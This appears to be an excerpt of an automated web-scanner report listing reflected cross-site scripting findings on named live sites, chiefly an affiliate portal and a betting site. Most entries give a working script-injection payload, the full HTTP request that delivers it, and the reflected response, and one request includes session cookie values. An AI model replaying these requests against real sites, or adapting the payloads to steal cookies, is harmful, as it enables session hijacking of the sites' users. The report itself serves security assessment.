Date: Mon, 16 May 2011 11:59:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
k(function(){
       $("#brands_ok_more").show("slow");
   $("#brands_popular").css("padding-top","630px");

       });
});

function RedirectToUrl(url){
//alert(url);
if (!url.indexOf('?')){url=url+'?CMI=15a96c</script><script>alert(1)</script>e23233807d6';}
window.location=url;

}
function goto(gourl){
window.location='/'+gourl+'/?CMI=15a96c</script>
...[SNIP]...

3.43. https://www.aspireaffiliates.com/ [CMI parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/

Issue detail

The value of the CMI request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15ef6"><script>alert(1)</script>b2d5fefb499 was submitted in the CMI parameter. This input was echoed as 15ef6\"><script>alert(1)</script>b2d5fefb499 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?CMI=15ef6"><script>alert(1)</script>b2d5fefb499 HTTP/1.1
Host: www.aspireaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:59:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe src="https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?CMI=15ef6\"><script>alert(1)</script>b2d5fefb499" frameborder="0" scrolling="no" height="96" width="950">
...[SNIP]...

3.44. https://www.aspireaffiliates.com/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17763"><script>alert(1)</script>f04f9a95002 was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed as 17763\"><script>alert(1)</script>f04f9a95002 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=117763"><script>alert(1)</script>f04f9a95002 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response

3.45. https://www.aspireaffiliates.com/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eda92</script><script>alert(1)</script>f5f515c1148 was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1eda92</script><script>alert(1)</script>f5f515c1148 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response

3.46. https://www.aspireaffiliates.com/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4800"><script>alert(1)</script>7b893187770 was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed as d4800\"><script>alert(1)</script>7b893187770 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=d4800"><script>alert(1)</script>7b893187770 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response

3.47. https://www.aspireaffiliates.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb220</script><script>alert(1)</script>85bdb6913a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?fb220</script><script>alert(1)</script>85bdb6913a5=1 HTTP/1.1
Host: www.aspireaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:59:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
.click(function(){
       $("#brands_ok_more").show("slow");
   $("#brands_popular").css("padding-top","630px");

       });
});

function RedirectToUrl(url){
//alert(url);
if (!url.indexOf('?')){url=url+'?fb220</script><script>alert(1)</script>85bdb6913a5=1';}
window.location=url;

}
function goto(gourl){
window.location='/'+gourl+'/?fb220</script>
...[SNIP]...

3.48. https://www.aspireaffiliates.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0cc2"><script>alert(1)</script>b04df9313ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d0cc2\"><script>alert(1)</script>b04df9313ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d0cc2"><script>alert(1)</script>b04df9313ef=1 HTTP/1.1
Host: www.aspireaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:59:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe src="https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?d0cc2\"><script>alert(1)</script>b04df9313ef=1" frameborder="0" scrolling="no" height="96" width="950">
...[SNIP]...

3.49. https://www.aspireaffiliates.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a034a"><script>alert(1)</script>761a7e15528 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a034a\"><script>alert(1)</script>761a7e15528 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?a034a"><script>alert(1)</script>761a7e15528=1 HTTP/1.1
Host: www.aspireaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:59:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?a034a\"><script>alert(1)</script>761a7e15528=1" title="Home">
...[SNIP]...

3.50. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [CMI parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/WebSite/Affiliates/login.aspx

Issue detail

The value of the CMI request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a43e"><script>alert(1)</script>9fec3b443df was submitted in the CMI parameter. This input was echoed as 3a43e\"><script>alert(1)</script>9fec3b443df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /WebSite/Affiliates/login.aspx?CMI=13a43e"><script>alert(1)</script>9fec3b443df HTTP/1.1
Host: www.aspireaffiliates.com
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?CMI=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

3.51. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/WebSite/Affiliates/login.aspx

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e7f5</script><script>alert(1)</script>51625b9e77d was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=12e7f5</script><script>alert(1)</script>51625b9e77d HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

3.52. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/WebSite/Affiliates/login.aspx

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 907ef"><script>alert(1)</script>9ba8bab1929 was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed as 907ef\"><script>alert(1)</script>9ba8bab1929 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=907ef"><script>alert(1)</script>9ba8bab1929 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

3.53. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/WebSite/Affiliates/login.aspx

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdd01"><script>alert(1)</script>7c3cf6160b7 was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed as bdd01\"><script>alert(1)</script>7c3cf6160b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1bdd01"><script>alert(1)</script>7c3cf6160b7 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

3.54. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/WebSite/Affiliates/login.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e175"><script>alert(1)</script>d02fb3e546d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8e175\"><script>alert(1)</script>d02fb3e546d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /WebSite/Affiliates/login.aspx?d0cc2\&8e175"><script>alert(1)</script>d02fb3e546d=1 HTTP/1.1
Host: www.aspireaffiliates.com
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

3.55. https://www.aspireaffiliates.com/marketing-samples/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/marketing-samples/

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3533"><script>alert(1)</script>c87eee535a4 was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed as b3533\"><script>alert(1)</script>c87eee535a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marketing-samples/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1b3533"><script>alert(1)</script>c87eee535a4 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

3.56. https://www.aspireaffiliates.com/marketing-samples/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/marketing-samples/

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1d3a"><script>alert(1)</script>cdc0ff990ea was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed as e1d3a\"><script>alert(1)</script>cdc0ff990ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marketing-samples/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=e1d3a"><script>alert(1)</script>cdc0ff990ea HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

3.57. https://www.aspireaffiliates.com/marketing-samples/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/marketing-samples/

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33f4f</script><script>alert(1)</script>059ba1b89e was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /marketing-samples/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=133f4f</script><script>alert(1)</script>059ba1b89e HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

3.58. https://www.aspireaffiliates.com/marketing-samples/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/marketing-samples/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79420"><script>alert(1)</script>acb62a6df93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 79420\"><script>alert(1)</script>acb62a6df93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marketing-samples/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&79420"><script>alert(1)</script>acb62a6df93=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

3.59. https://www.aspireaffiliates.com/marketing-samples/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/marketing-samples/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42ccb</script><script>alert(1)</script>48b926f12c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /marketing-samples/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&42ccb</script><script>alert(1)</script>48b926f12c9=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

3.60. https://www.aspireaffiliates.com/marketing-samples/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/marketing-samples/

Remediation detail

Request

GET /mobile/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1e4024</script><script>alert(1)</script>0074ed146f4 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

3.63. https://www.aspireaffiliates.com/mobile/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/mobile/

Remediation detail

Request

GET /mobile/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&2e4bc</script><script>alert(1)</script>34debe0dd4c=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

3.66. https://www.aspireaffiliates.com/mobile/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/mobile/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5944"><script>alert(1)</script>b657ab65e6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c5944\"><script>alert(1)</script>b657ab65e6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mobile/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&c5944"><script>alert(1)</script>b657ab65e6b=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

3.67. http://www.bet365.com/home/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bet365.com
Path:	/home/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f18d6"><script>alert(1)</script>b33b92fe45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home/?f18d6"><script>alert(1)</script>b33b92fe45=1 HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:51 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 45587
Content-Type: text/html
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Cache-control: private


<html>

<link rel="shortcut icon" href="http://www.bet365.com/favicons/bet365-favicon.ico" type="image/x-icon">
<head>
<META http-equiv="Content-Type" content="text/html;
...[SNIP]...
